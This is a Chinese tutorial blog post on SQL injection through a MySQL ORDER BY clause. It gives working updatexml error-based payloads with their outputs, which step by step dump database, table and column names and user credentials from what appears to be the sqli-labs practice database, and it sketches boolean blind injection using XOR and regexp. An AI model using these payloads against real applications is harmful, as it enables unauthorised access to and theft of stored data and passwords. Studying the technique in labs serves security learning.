mysql oder by 注入_orderby 注入

0x01 介绍

顾名思义,注入点出现在oder by后面即可称为order by 注入

正常的oder by 语句:

select * from users order by id desc;

当desc此处位置参数可控时,即有可能存在oreder by注入,那么如何在这样的情况下注出我们想要的数据呢?

1.如果有报错信息输出,可尝试通过报错注入完成sql注入攻击

2.如果没有回显,可尝试盲注的手法来注入

0x02通过报错注入(有回显)

这里用updatexml函数来执行报错注入的效果:

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));

ERROR 1105 (HY000): XPATH syntax error: '~security' //获取当前数据库

获取数据库个数

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));

获取数据库列表

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),0));

ERROR 1105 (HY000): XPATH syntax error: '~information_schema'

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),0));

ERROR 1105 (HY000): XPATH syntax error: '~security'

获取表个数

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "security")),0));

ERROR 1105 (HY000): XPATH syntax error: '~4'

获取表名

mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "security")),0));

ERROR 1105 (HY000): XPATH syntax error: '~emails,referers,uagents,users'

获取字段个数

mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "security" and table_name = "users")),0));

ERROR 1105 (HY000): XPATH syntax error: '~3'

获取字段名

mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));

ERROR 1105 (HY000): XPATH syntax error: '~id,username,password'

获取信息

mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username from users limit 0,1)),0));

ERROR 1105 (HY000): XPATH syntax error: '~Dumb'

mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select password from users limit 0,1)),0));

ERROR 1105 (HY000): XPATH syntax error: '~Dumb'

0x03 通过盲注(没有回显)

另外就是没有order by注入没有回显的情况,这时就该用到盲注了,也就是说采取根据页面回显的状态进行判断的形式来进行布尔盲注。

首先这里运用到了一个异或的知识,0异或任何数值都还是这个值的本身,比如说

0^10010的值还是10010。

接着再来看刚刚的简单sql语句

select * from users order by id desc;

这里的desc是可控字符串的话,我们让这条语句变下形:

select * from users order by id ^0;

这样的话,由于order by默认是升序排列的,没有desc也没有影响,同时,加上了^0也还是id本身,所以跟原来正常的排序没有任何的变化。

select * from users order by id ^1;

但如果是加上了^1的话,就会跟原来的排序发生明显变化,盲注也就通过这里的变化来判断我们注入的sql语句是否返回1。

另外,这里的盲注还用到了regexp,最终的sql注入语句变为:

select * from users order by id ^(select(select version()) regexp '^5');

你可能感兴趣的:(mysql,oder,by,注入)